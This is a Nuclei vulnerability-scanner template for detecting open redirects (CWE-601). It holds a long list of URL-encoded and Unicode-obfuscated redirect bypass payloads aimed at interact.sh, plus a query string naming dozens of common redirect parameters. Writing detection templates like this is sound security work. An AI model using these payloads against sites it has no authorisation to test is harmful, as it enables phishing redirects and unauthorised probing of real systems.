130 lines
5.3 KiB
YAML
130 lines
5.3 KiB
YAML
id: open-redirect
|
|
|
|
info:
|
|
name: Open Redirect - Detection
|
|
author: afaq,melbadry9,Elmahdi,pxmme1337,Regala_,andirrahmani1,geeknik
|
|
severity: low
|
|
description: An open redirect vulnerability was detected. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cwe-id: CWE-601
|
|
tags: redirect,generic
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
GET /{{redirect}} HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
payloads:
|
|
redirect:
|
|
- '%0a/interact.sh/'
|
|
- '%0d/interact.sh/'
|
|
- '%00/interact.sh/'
|
|
- '%09/interact.sh/'
|
|
- '%5C%5Cinteract.sh/%252e%252e%252f'
|
|
- '%5Cinteract.sh'
|
|
- '%5cinteract.sh/%2f%2e%2e'
|
|
- '%5c{{RootURL}}interact.sh/%2f%2e%2e'
|
|
- '../interact.sh'
|
|
- '.interact.sh'
|
|
- '/%5cinteract.sh'
|
|
- '////\;@interact.sh'
|
|
- '////interact.sh'
|
|
- '///interact.sh'
|
|
- '///interact.sh/%2f%2e%2e'
|
|
- '///interact.sh@//'
|
|
- '///{{RootURL}}interact.sh/%2f%2e%2e'
|
|
- '//;@interact.sh'
|
|
- '//\/interact.sh/'
|
|
- '//\@interact.sh'
|
|
- '//\interact.sh'
|
|
- '//\tinteract.sh/'
|
|
- '//interact.sh/%2F..'
|
|
- '//interact.sh//'
|
|
- '//%69%6e%74%65%72%61%63%74%2e%73%68'
|
|
- '//interact.sh@//'
|
|
- '//interact.sh\tinteract.sh/'
|
|
- '//https://interact.sh@//'
|
|
- '/<>//interact.sh'
|
|
- '/\/\/interact.sh/'
|
|
- '/\/interact.sh'
|
|
- '/\interact.sh'
|
|
- '/interact.sh'
|
|
- '/interact.sh/%2F..'
|
|
- '/interact.sh/'
|
|
- '/interact.sh/..;/css'
|
|
- '/https:interact.sh'
|
|
- '/{{RootURL}}interact.sh/'
|
|
- '/〱interact.sh'
|
|
- '/〵interact.sh'
|
|
- '/ゝinteract.sh'
|
|
- '/ーinteract.sh'
|
|
- '/ーinteract.sh'
|
|
- '<>//interact.sh'
|
|
- '@interact.sh'
|
|
- '@https://interact.sh'
|
|
- '\/\/interact.sh/'
|
|
- 'interact%E3%80%82sh'
|
|
- 'interact.sh'
|
|
- 'interact.sh/'
|
|
- 'interact.sh//'
|
|
- 'interact.sh;@'
|
|
- 'https%3a%2f%2finteract.sh%2f'
|
|
- 'https:%0a%0dinteract.sh'
|
|
- 'https://%0a%0dinteract.sh'
|
|
- 'https://%09/interact.sh'
|
|
- 'https://%2f%2f.interact.sh/'
|
|
- 'https://%3F.interact.sh/'
|
|
- 'https://%5c%5c.interact.sh/'
|
|
- 'https://%5cinteract.sh@'
|
|
- 'https://%23.interact.sh/'
|
|
- 'https://.interact.sh'
|
|
- 'https://////interact.sh'
|
|
- 'https:///interact.sh'
|
|
- 'https:///interact.sh/%2e%2e'
|
|
- 'https:///interact.sh/%2f%2e%2e'
|
|
- 'https:///interact.sh@interact.sh/%2e%2e'
|
|
- 'https:///interact.sh@interact.sh/%2f%2e%2e'
|
|
- 'https://:80#@interact.sh/'
|
|
- 'https://:80?@interact.sh/'
|
|
- 'https://:@\@interact.sh'
|
|
- 'https://:@interact.sh\@interact.sh'
|
|
- 'https://:@interact.sh\@WillBeReplaced.com'
|
|
- 'https://;@interact.sh'
|
|
- 'https://\tinteract.sh/'
|
|
- 'https://interact.sh/interact.sh'
|
|
- 'https://interact.sh/https://interact.sh/'
|
|
- 'https://www.\.interact.sh'
|
|
- 'https:/\/\interact.sh'
|
|
- 'https:/\interact.sh'
|
|
- 'https:/interact.sh'
|
|
- 'https:interact.sh'
|
|
- '{{RootURL}}interact.sh'
|
|
- '〱interact.sh'
|
|
- '〵interact.sh'
|
|
- 'ゝinteract.sh'
|
|
- 'ーinteract.sh'
|
|
- 'ーinteract.sh'
|
|
- '?page=interact.sh&_url=interact.sh&callback=interact.sh&checkout_url=interact.sh&content=interact.sh&continue=interact.sh&continueTo=interact.sh&counturl=interact.sh&data=interact.sh&dest=interact.sh&dest_url=interact.sh&dir=interact.sh&document=interact.sh&domain=interact.sh&done=interact.sh&download=interact.sh&feed=interact.sh&file=interact.sh&host=interact.sh&html=interact.sh&http=interact.sh&https=interact.sh&image=interact.sh&image_src=interact.sh&image_url=interact.sh&imageurl=interact.sh&include=interact.sh&langTo=interact.sh&media=interact.sh&navigation=interact.sh&next=interact.sh&open=interact.sh&out=interact.sh&page=interact.sh&page_url=interact.sh&pageurl=interact.sh&path=interact.sh&picture=interact.sh&port=interact.sh&proxy=interact.sh&redir=interact.sh&redirect=interact.sh&redirectUri=interact.sh&redirectUrl=interact.sh&reference=interact.sh&referrer=interact.sh&req=interact.sh&request=interact.sh&retUrl=interact.sh&return=interact.sh&returnTo=interact.sh&return_path=interact.sh&return_to=interact.sh&rurl=interact.sh&show=interact.sh&site=interact.sh&source=interact.sh&src=interact.sh&target=interact.sh&to=interact.sh&uri=interact.sh&url=interact.sh&val=interact.sh&validate=interact.sh&view=interact.sh&window=interact.sh&redirect_to=interact.sh&ret=interact.sh&r2=interact.sh&img=interact.sh&u=interact.sh&r=interact.sh&URL=interact.sh&AuthState=interact.sh'
|
|
|
|
stop-at-first-match: true
|
|
matchers-condition: and
|
|
matchers:
|
|
|
|
- type: regex
|
|
part: header
|
|
regex:
|
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
|
|
|
- type: status
|
|
status:
|
|
- 301
|
|
- 302
|
|
- 307
|
|
- 308
|
|
condition: or
|
|
|
|
# Enhanced by mp on 2022/10/14
|